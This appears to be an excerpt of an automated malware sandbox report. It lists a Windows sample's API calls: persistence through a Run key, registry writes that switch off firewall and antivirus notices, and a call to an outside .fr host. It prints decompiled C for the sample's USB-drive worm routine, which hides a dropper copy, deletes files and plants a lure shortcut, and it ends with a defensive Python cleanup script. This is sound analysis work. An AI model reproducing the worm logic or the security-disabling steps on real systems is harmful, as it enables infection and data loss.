                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405E41
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405E4C
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00405E57
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,argarhrharharfafrahth), ref: 00405E67
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405E72
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405E7D
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405E8A
                                                                                  • Sleep.KERNEL32(00000DAC), ref: 00405E95
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405EA2
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405EAD
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00405EC9
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405ED4
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00405EE1
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405EEC
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405EFF
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405F2C
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405F4B
                                                                                  • Sleep.KERNEL32(00002710), ref: 00405F56
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405F61
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405F6E
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405F79
                                                                                  • Sleep.KERNEL32(00000064), ref: 00405F81
                                                                                  • MoveFileA.KERNEL32 ref: 00405F91
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405F9C
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405FAC
                                                                                  • DeleteFileA.KERNEL32(2dgd828d8g8fg8g8g), ref: 00405FB7
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FC4
                                                                                  • FindWindowA.USER32 ref: 00405FF3
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040600D
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00406018
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00406028
                                                                                  • Sleep.KERNEL32(00001388), ref: 00406033
                                                                                  • Sleep.KERNEL32(00001388), ref: 0040603E
                                                                                  • PathFileExistsA.SHLWAPI(aefafugaugfgauegf), ref: 0040605A
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00406069
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406074
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040607F
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 0040608A
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406095
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060A0
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060AB
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060B6
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060C1
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,ffag8f2g8fg82g8f8g8fg), ref: 004060D1
                                                                                  • FindWindowA.USER32 ref: 004060DE
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060F8
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00406105
                                                                                  • ShowWindow.USER32(00000000,00000001), ref: 00406114
                                                                                  • Sleep.KERNEL32(00003A98), ref: 0040611F
                                                                                  • MoveFileA.KERNEL32 ref: 0040612F
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 0040613A
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406145
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406150
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 0040615B
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00406166
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 0040619D
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004061A8
                                                                                  • Sleep.KERNEL32(00002328), ref: 004061B3
                                                                                  • MoveFileW.KERNEL32(argarhrharharfafrahth,4yy4w4yw4fwgwgw), ref: 004061C3
                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,984658), ref: 004061E8
                                                                                  • GetLastError.KERNEL32 ref: 004061F4
                                                                                  • ExitProcess.KERNEL32 ref: 00406203
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Id4zlrsrZ4.exe,00000105), ref: 00406229
                                                                                  • PathFindFileNameW.SHLWAPI(C:\Users\user\Desktop\Id4zlrsrZ4.exe), ref: 00406234
                                                                                  • wsprintfW.USER32 ref: 00406251
                                                                                  • DeleteFileW.KERNELBASE(?), ref: 00406261
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00406278
                                                                                  • ExitProcess.KERNEL32 ref: 0040632D
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%windir%,?,00000104), ref: 00406344
                                                                                  • wsprintfW.USER32 ref: 00406362
                                                                                  • CopyFileW.KERNELBASE(C:\Users\user\Desktop\Id4zlrsrZ4.exe,?,00000000), ref: 00406379
                                                                                  • SetFileAttributesW.KERNELBASE(?,00000003), ref: 00406390
                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 004063AE
                                                                                  • RegSetValueExW.KERNELBASE(00000000,Windows Settings,00000000,00000001,?,?), ref: 0040642E
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040643B
                                                                                  • ExitProcess.KERNEL32 ref: 0040645A
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406465
                                                                                  • wsprintfW.USER32 ref: 00406483
                                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\Id4zlrsrZ4.exe,?,00000000), ref: 0040649A
                                                                                  • SetFileAttributesW.KERNEL32(?,00000003), ref: 004064B1
                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 004064CF
                                                                                  • RegSetValueExW.ADVAPI32(00000000,Windows Settings,00000000,00000001,?,?), ref: 0040654F
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040655C
                                                                                  • ExitProcess.KERNEL32 ref: 0040657B
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406586
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,00000000), ref: 004065A4
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 004065CB
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004065EA
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 00406609
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406628
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406647
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 00406666
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 00406685
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00406692
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center\Svc,00000000,00020006,00000000), ref: 004066B0
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 004066D7
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004066F6
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 00406715
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406734
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406753
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 00406772
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 00406791
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040679E
                                                                                  • Sleep.KERNEL32(000001F4), ref: 004067A9
                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 004067CB
                                                                                  • wsprintfW.USER32 ref: 004067E2
                                                                                  • wsprintfW.USER32 ref: 004067FC
                                                                                  • CreateThread.KERNEL32 ref: 00406814
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040681F
                                                                                  • CreateThread.KERNEL32 ref: 00406834
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040683F
                                                                                  • CreateThread.KERNEL32 ref: 00406854
                                                                                  • Sleep.KERNEL32(00002710), ref: 0040685F
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040687C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Delete$Sleep$Move$Value$Internet$Window$CloseOpen$FindHandle$Createwsprintf$ExitProcess$ForegroundShowThread$AttributesCopyEnvironmentExpandNamePathStrings$ErrorEventExistsLastModuleMutexStartup
                                                                                  • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tncmds.dat$%s\tnnodes.dat$%userprofile%$%windir%$(#$,$2#$2dgd828d8g8fg8g8g$4yy4w4yw4fwgwgw$579795729858927452784$7$984658$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\Desktop\Id4zlrsrZ4.exe$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$aefafugaugfgauegf$aefyaiegfayegfg$argarhargafafargh$argarhrharharfafrahth$feu8gf8g2gf8g2fg$ffag8f2g8fg82g8f8g8fg$http://2462462645.fr/$ttyu8ruy8uy8u8yu$winrecsv.exe
                                                                                  • API String ID: 1472887078-911532292
                                                                                  • Opcode ID: d3d9f545dab84f0d5262fc2406b66f377c68c0d8d20069a12fc3b629659c4998
                                                                                  • Instruction ID: 5381a988ab4d71a95ab7e29ec0f43e912bf8196cdff92c6a99a63db8bd3eacf6
                                                                                  • Opcode Fuzzy Hash: d3d9f545dab84f0d5262fc2406b66f377c68c0d8d20069a12fc3b629659c4998
                                                                                  • Instruction Fuzzy Hash: 5472EF71680314ABD7209F90AC4AFD97B74BB48B06F2085A5F709B61D0DAF85AC4CF5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

Control-flow Graph (basic block: address range, API calls, successor blocks)

• 104: 40d740-40d79e memset, CreateProcessW -> 105, 106
• 105: 40d7a0-40d7ad Sleep -> 109
• 106: 40d7af-40d7d3 ShellExecuteW -> 107, 108
• 107: 40d7e4 -> 109
• 108: 40d7d5-40d7e2 Sleep -> 109
• 109: 40d7e6-40d7e9 (return)
                                                                                  C-Code - Quality: 100%
			E0040D740(char _a4) {                      // _a4: path / command line of the file to launch
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v100;
				intOrPtr _v104;
				int _t20;
				char* _t11;
				char* _t12;

				memset( &_v100, 0, 0x44);                 // 0x44 = sizeof(STARTUPINFOW)
				_v24.hProcess = 0;
				_v24.hThread = 0;
				_v24.dwProcessId = 0;
				_v24.dwThreadId = 0;
				_v100.cb = 0x44;
				_v100.dwFlags = 1;                        // STARTF_USESHOWWINDOW
				_v100.wShowWindow = 5;                    // SW_SHOW
				_t11 =  &_a4; // 0x40656e
				// dwCreationFlags 0x20 = NORMAL_PRIORITY_CLASS; no inherited handles, no environment, no working directory
				_t20 = CreateProcessW(0,  *_t11, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24); // executed
				if(_t20 != 1) {
					// CreateProcessW failed: fall back to ShellExecuteW "open", which also starts
					// non-PE targets through their registered handler.
					_t12 =  &_a4; // 0x40656e
					_v8 = ShellExecuteW(0, L"open",  *_t12, 0, 0, 0);
					_v104 = _v8;
					if(_v104 <= 0x20) {                   // ShellExecuteW returns a value > 32 on success
						return 0;
					}
					Sleep(0x3e8);                         // 1000 ms
					return 1;
				}
				Sleep(0x3e8); // executed                 // 1000 ms; hProcess/hThread are never closed
				return 1;
			}

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040D74E
                                                                                  • CreateProcessW.KERNELBASE ref: 0040D795
                                                                                  • Sleep.KERNELBASE(000003E8), ref: 0040D7A5
                                                                                  • ShellExecuteW.SHELL32(00000000,open,ne@,00000000,00000000,00000000), ref: 0040D7C0
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D7DA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$CreateExecuteProcessShellmemset
                                                                                  • String ID: $D$ne@$open
                                                                                  • API String ID: 2222793131-3207568236
                                                                                  • Opcode ID: 5f6903af65bfe535200d81666b806fcc276bdec7bf2871f08574f27a7109b4d3
                                                                                  • Instruction ID: 933796f3933de1520c7fb78abd268757ff0d70a2e837ae2d9ddd379650c1acbf
                                                                                  • Opcode Fuzzy Hash: 5f6903af65bfe535200d81666b806fcc276bdec7bf2871f08574f27a7109b4d3
                                                                                  • Instruction Fuzzy Hash: 05110071E84308BBEB14DFD4DD46BDE7774AB18700F20412AF609BB2C0D7B55A448B59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

Control-flow Graph (basic block: address range, API calls, successor blocks)

• 121: 404bd0-404be5 _chkstk -> 122, 123
• 122: 404be7-404be9 -> 126
• 123: 404bee-404ca0 wsprintfW * 5, PathFileExistsW -> 124, 125
• 124: 404ca2-404cc3 call 40d530 -> 125, 135
• 125: 404ce4-404cf3 PathFileExistsW -> 128, 129
• 126: 4050a5-4050a8 (return)
• 128: 404d60-404d6f PathFileExistsW -> 133, 134
• 129: 404cf5-404d04 PathFileExistsW -> 131, 132
• 131: 404d06-404d17 CreateDirectoryW -> 132, 138
• 132: 404d28-404d37 PathFileExistsW -> 128, 139
• 133: 404d71-404d77 -> 140, 141
• 134: 404db6-404dd7 FindFirstFileW -> 136, 137
• 135: 404cc5-404cde SetFileAttributesW, DeleteFileW -> 125
• 136: 404ddd-404e95 -> 143
• 137: 40509f -> 126
• 138: 404d19-404d22 SetFileAttributesW -> 132
• 139: 404d39-404d4f CopyFileW -> 128, 144
• 140: 404d91-404da4 call 404980 -> 150
• 141: 404d79-404d8f call 404980 -> 150
• 143: 404e9f-404eb3 lstrcmpW -> 147, 148
• 144: 404d51-404d5a SetFileAttributesW -> 128
• 147: 404eb5-404ec9 lstrcmpW -> 148, 151
• 148: 404ecb -> 152
• 150: 404da7-404db0 SetFileAttributesW -> 134
• 151: 404ed0-404ee1 -> 153, 154
• 152: 405076-40508c FindNextFileW -> 143, 155
• 153: 404ef2-404ef9 -> 156, 157
• 154: 404ee3-404eec -> 153
• 155: 405092-405099 FindClose -> 137
• 156: 404f27-404f30 -> 160, 161
• 157: 404efb-404f18 lstrcmpiW -> 158, 159
• 158: 404f1a -> 154
• 159: 404f1c-404f23 -> 156
• 160: 404f32 -> 152
• 161: 404f37-404f48 -> 162, 163
• 162: 404f59-404f60 -> 164, 165
• 163: 404f4a-404f53 -> 162
• 164: 404fd0-404fd9 -> 166, 167
• 165: 404f62-404f7f PathMatchSpecW -> 168, 169
• 166: 404fe0-404fef PathFileExistsW -> 170, 171
• 167: 404fdb -> 152
• 168: 404f81 -> 163
• 169: 404f83-404fc9 wsprintfW, SetFileAttributesW, DeleteFileW -> 164
• 170: 404ff1 -> 152
• 171: 404ff6-405046 wsprintfW * 2 -> 172, 173
• 172: 405060-405070 MoveFileExW -> 152
• 173: 405048-40505e call 404a90 -> 152
                                                                                  C-Code - Quality: 100%
			E00404BD0(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16) {
				// _a4: drive root to infect; _a8: base name of the lure shortcut; _a12: flags (bit 0x80000 aborts);
				// _a16: selects which shell32.dll icon the lure uses.
				short _v524;                          // "<root>\<stash>\<name>"  (destination of a moved entry)
				short _v1044;                         // "<root>\*"                (FindFirstFileW pattern)
				short _v1564;                         // "<_a8>.lnk"
				short _v2084;                         // "<root>\<name>"           (entry to delete)
				intOrPtr _v2088;                      // stash folder name (string at 0x4140cc, not resolved by the decompiler)
				short _v2612;                         // "<root>\<_a8>.lnk"        (lure shortcut)
				short _v3132;                         // "<root>\<name>"           (entry to move)
				char _v3133;                          // return value
				struct _WIN32_FIND_DATAW _v3732;
				short _v4252;                         // "<root>\<stash>"
				void* _v4256;                         // find handle
				short _v4780;                         // "<root>\<stash>\VolDriver.exe"
				intOrPtr _v4784;                      // value computed over an existing VolDriver.exe
				WCHAR* _v4788;                        // _v4788.._v4808: the 6 reserved names (never deleted or moved)
				WCHAR* _v4792;
				WCHAR* _v4796;
				WCHAR* _v4800;
				WCHAR* _v4804;
				intOrPtr _v4808;
				WCHAR* _v4812;                        // _v4812.._v4860: the 13 wildcard patterns that get deleted
				WCHAR* _v4816;
				WCHAR* _v4820;
				WCHAR* _v4824;
				WCHAR* _v4828;
				WCHAR* _v4832;
				WCHAR* _v4836;
				WCHAR* _v4840;
				WCHAR* _v4844;
				WCHAR* _v4848;
				WCHAR* _v4852;
				WCHAR* _v4856;
				WCHAR* _v4860;
				signed char _v4861;                   // "entry was deleted" flag
				signed char _v4862;                   // "entry is a reserved name" flag
				signed int _v4868;
				signed int _v4872;
				intOrPtr _t167;
				intOrPtr _t195;
				void* _t218;
				void* _t219;
				void* _t224;

				L0040F1AA();                          // _chkstk: probes the ~0x1300-byte stack frame
				if((_a12 & 0x00080000) != 0) {
					return 0;                         // caller asked to skip this drive
				}
				_v2088 = 0x4140cc;
				_v3133 = 0;                           // never set to anything else in this listing
				wsprintfW( &_v1564, L"%s.lnk", _a8);
				wsprintfW( &_v4252, L"%s\\%s", _a4, _v2088);
				wsprintfW( &_v4780, L"%s\\%s\\VolDriver.exe", _a4, _v2088);
				wsprintfW( &_v2612, L"%s\\%s", _a4,  &_v1564);
				wsprintfW( &_v1044, L"%s\\*", _a4);
				_t224 = _t219 + 0x48;
				// 1. If a copy is already on the drive, compare a value derived from it (E0040D530, not shown)
				//    with the global at 0x414410; on mismatch the stale copy is unhidden and deleted.
				if(PathFileExistsW( &_v4780) != 0) {
					_t167 = E0040D530( &_v4780);
					_t224 = _t224 + 4;
					_v4784 = _t167;
					_t195 =  *0x414410; // 0x0
					if(_t195 != _v4784) {
						SetFileAttributesW( &_v4780, 0x80);   // FILE_ATTRIBUTE_NORMAL: clear hidden/read-only first
						DeleteFileW( &_v4780);
					}
				}
				// 2. (Re)create the stash folder and drop the copy into it; both are marked hidden (2 = FILE_ATTRIBUTE_HIDDEN).
				//    The copy source is the path held in the global at 0x414418 (not resolved here).
				if(PathFileExistsW( &_v4780) == 0) {
					if(PathFileExistsW( &_v4252) == 0 && CreateDirectoryW( &_v4252, 0) != 0) {
						SetFileAttributesW( &_v4252, 2);
					}
					if(PathFileExistsW( &_v4252) != 0 && CopyFileW(0x414418,  &_v4780, 0) != 0) {
						SetFileAttributesW( &_v4780, 2);
					}
				}
				// 3. Create the lure shortcut through the helper at 0x404980 (not shown), using icon index 8 or 9
				//    of shell32.dll depending on _a16, and make it read-only (1 = FILE_ATTRIBUTE_READONLY).
				if(PathFileExistsW( &_v2612) == 0) {
					if((_a16 & 0x000000ff) == 0) {
						E00404980( &_v2612, L"shell32.dll", 8);
						_t224 = _t224 + 0xc;
					} else {
						E00404980( &_v2612, L"shell32.dll", 9);
						_t224 = _t224 + 0xc;
					}
					SetFileAttributesW( &_v2612, 1);
				}
				// 4. Sweep every entry at the drive root.
				_v4256 = FindFirstFileW( &_v1044,  &_v3732);
				if(_v4256 == 0xffffffff) {            // INVALID_HANDLE_VALUE
					L45:
					return _v3133;
				} else {
					// 13 patterns that are deleted outright: existing shortcuts (so the lure is the only .lnk left)
					// and script/binary types that could belong to a competing infection.
					_v4860 = L"*.lnk";
					_v4856 = L"*.vbs";
					_v4852 = L"*.js";
					_v4848 = L"*.scr";
					_v4844 = L"*.com";
					_v4840 = L"*.jse";
					_v4836 = L"*.cmd";
					_v4832 = L"*.pif";
					_v4828 = L"*.jar";
					_v4824 = L"*.dll";
					_v4820 = L"*.vbe";
					_v4816 = L"*.bat";
					_v4812 = L"*.inf";
					// 6 names that are left in place: the stash folder, the lure and the usual system entries.
					_v4808 = _v2088;
					_v4804 =  &_v1564;
					_v4800 = L"Thumbs.db";
					_v4796 = L"$RECYCLE.BIN";
					_v4792 = L"desktop.ini";
					_v4788 = L"System Volume Information";
					do {
						if(lstrcmpW( &(_v3732.cFileName), L".") != 0 && lstrcmpW( &(_v3732.cFileName), L"..") != 0) {
							_v4862 = 0;
							_v4868 = 0;
							while(_v4868 < 6) {           // case-insensitive match against the reserved-name table (ebp-relative)
								if(lstrcmpiW( &(_v3732.cFileName),  *(_t218 + _v4868 * 4 - 0x12c4)) == 0) {
									_v4862 = 1;
									break;
								}
								_v4868 = _v4868 + 1;
							}
							if((_v4862 & 0x000000ff) == 0) {
								_v4861 = 0;
								_v4872 = 0;
								while(_v4872 < 0xd) {     // wildcard match against the 13 deletion patterns
									if(PathMatchSpecW( &(_v3732.cFileName),  *(_t218 + _v4872 * 4 - 0x12f8)) != 0) {
										wsprintfW( &_v2084, L"%s\\%s", _a4,  &(_v3732.cFileName));
										_t224 = _t224 + 0x10;
										SetFileAttributesW( &_v2084, 0x80);   // clear attributes so DeleteFileW succeeds
										DeleteFileW( &_v2084);
										_v4861 = 1;
										break;
									}
									_v4872 = _v4872 + 1;
								}
								// Everything else is moved into the hidden stash, so the user sees only the lure.
								if((_v4861 & 0x000000ff) == 0) {
									if(PathFileExistsW( &_v4252) != 0) {
										wsprintfW( &_v3132, L"%s\\%s", _a4,  &(_v3732.cFileName));
										wsprintfW( &_v524, L"%s\\%s\\%s", _a4, _v2088,  &(_v3732.cFileName));
										_t224 = _t224 + 0x24;
										if((_v3732.dwFileAttributes & 0x00000010) == 0) {   // FILE_ATTRIBUTE_DIRECTORY
											// 9 = MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH
											MoveFileExW( &_v3132,  &_v524, 9);
										} else {
											E00404A90( &_v3132,  &_v524);   // helper at 0x404a90 (not shown) moves directories
											_t224 = _t224 + 8;
										}
									}
								}
								goto L43;
							}
						}
						L43:
					} while (FindNextFileW(_v4256,  &_v3732) != 0);
					FindClose(_v4256);
					goto L45;
				}
			}
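The routine above is the sample's removable-drive infection logic: a hidden stash folder holding a VolDriver.exe copy, the drive's original entries moved into it, and a read-only .lnk lure left at the root. The script below is an added example, not code from the Joe Sandbox report or from the sample. It triages a drive root for that layout and reverses it without overwriting anything; the stash folder name "_" is an assumption (the real name is the unresolved string at 0x4140cc), the fixture tree is constructed, and the reserved names and dropper name are taken from the listing.

```python
"""Triage and cleanup for the drive layout left by E00404BD0 (added example, not
code from the Joe Sandbox report or the sample): rebuild the pattern the decompiled
routine produces, detect it, and reverse it without overwriting anything."""
import shutil
import stat
import tempfile
from pathlib import Path

DROPPER_NAME = "VolDriver.exe"   # from the "%s\\%s\\VolDriver.exe" format string
STASH_NAME = "_"                 # ASSUMPTION: the real name is the unresolved string at 0x4140cc
# Names the routine never touches when sweeping the root into the stash.
SKIPPED_NAMES = ("Thumbs.db", "$RECYCLE.BIN", "desktop.ini", "System Volume Information")


def find_stash_dirs(root):
    """Top-level directories holding a VolDriver.exe copy: the worm's stash folder(s)."""
    return sorted((d for d in Path(root).iterdir()
                   if d.is_dir() and d.name not in SKIPPED_NAMES and (d / DROPPER_NAME).is_file()),
                  key=lambda p: p.name)


def find_lure_links(root):
    """.lnk files at the root: the routine deletes legitimate ones first, so what is left is its lure."""
    return sorted((p for p in Path(root).iterdir() if p.is_file() and p.suffix.lower() == ".lnk"),
                  key=lambda p: p.name)


def triage(root):
    """Summarise one drive root without changing anything."""
    stashes = find_stash_dirs(root)
    return {"infected": bool(stashes),
            "stash_dirs": [s.name for s in stashes],
            "lure_links": [p.name for p in find_lure_links(root)],
            "held_files": {s.name: sorted(p.name for p in s.iterdir() if p.name != DROPPER_NAME)
                           for s in stashes}}


def _force_unlink(path):
    path.chmod(path.stat().st_mode | stat.S_IWRITE)   # the lure is set read-only (attribute 1)
    path.unlink()


def restore(root, dry_run=False):
    """Move the victim's entries back to the root, delete dropper and lure; never overwrite.
    Returns the actions taken (or planned, when dry_run=True)."""
    root = Path(root)
    actions = []
    lures = find_lure_links(root)             # collected before anything is moved back
    for stash in find_stash_dirs(root):
        for entry in sorted(stash.iterdir(), key=lambda p: p.name):
            if entry.name == DROPPER_NAME:
                actions.append(("delete", str(entry)))
                if not dry_run:
                    _force_unlink(entry)
                continue
            target = root / entry.name
            if target.exists():                   # name clash: leave for manual review
                actions.append(("skip-clash", str(entry)))
                continue
            actions.append(("move", str(entry), str(target)))
            if not dry_run:
                shutil.move(str(entry), str(target))
        actions.append(("rmdir", str(stash)))
        if not dry_run and not any(stash.iterdir()):
            stash.rmdir()
    for lure in lures:
        actions.append(("delete", str(lure)))
        if not dry_run:
            _force_unlink(lure)
    return actions


def build_sample_tree(base):
    """Constructed fixture reproducing the post-infection layout (not real sample output)."""
    root = Path(base) / "E"
    stash = root / STASH_NAME
    (stash / "photos").mkdir(parents=True)
    (stash / DROPPER_NAME).write_bytes(b"MZ" + b"\x00" * 62)
    (stash / "report.docx").write_text("victim document")
    (stash / "photos" / "a.jpg").write_bytes(b"\xff\xd8\xff")
    (root / "E.lnk").write_bytes(b"L\x00\x00\x00")   # lure named "%s.lnk" after the drive
    (root / "Thumbs.db").write_bytes(b"")
    (root / "System Volume Information").mkdir()
    return root


def run_demo():
    """Triage, plan, clean and re-triage a constructed drive; returns the observations."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(tmp)
        before = triage(root)
        plan = restore(root, dry_run=True)
        untouched = (root / STASH_NAME / "report.docx").exists()
        restore(root)
        after = triage(root)
        restored = ((root / "report.docx").read_text() == "victim document"
                    and (root / "photos" / "a.jpg").is_file())
        return {"before": before, "plan": plan, "dry_run_untouched": untouched,
                "after": after, "restored": restored}


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

On a real drive, run `triage()` first and `restore(root, dry_run=True)` to review the planned moves; the stash folder is identified by the presence of VolDriver.exe rather than by its name, since that name is not recoverable from the listing. The script does not re-apply the 13 deletion patterns, because the files they matched are already gone by the time the drive is examined.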
                                                                                  0x00404df1
                                                                                  0x00404dfb
                                                                                  0x00404e05
                                                                                  0x00404e0f
                                                                                  0x00404e19
                                                                                  0x00404e23
                                                                                  0x00404e2d
                                                                                  0x00404e37
                                                                                  0x00404e41
                                                                                  0x00404e4b
                                                                                  0x00404e55
                                                                                  0x00404e65
                                                                                  0x00404e71
                                                                                  0x00404e77
                                                                                  0x00404e81
                                                                                  0x00404e8b
                                                                                  0x00404e95
                                                                                  0x00404e9f
                                                                                  0x00404eb3
                                                                                  0x00404ed0
                                                                                  0x00404ed7
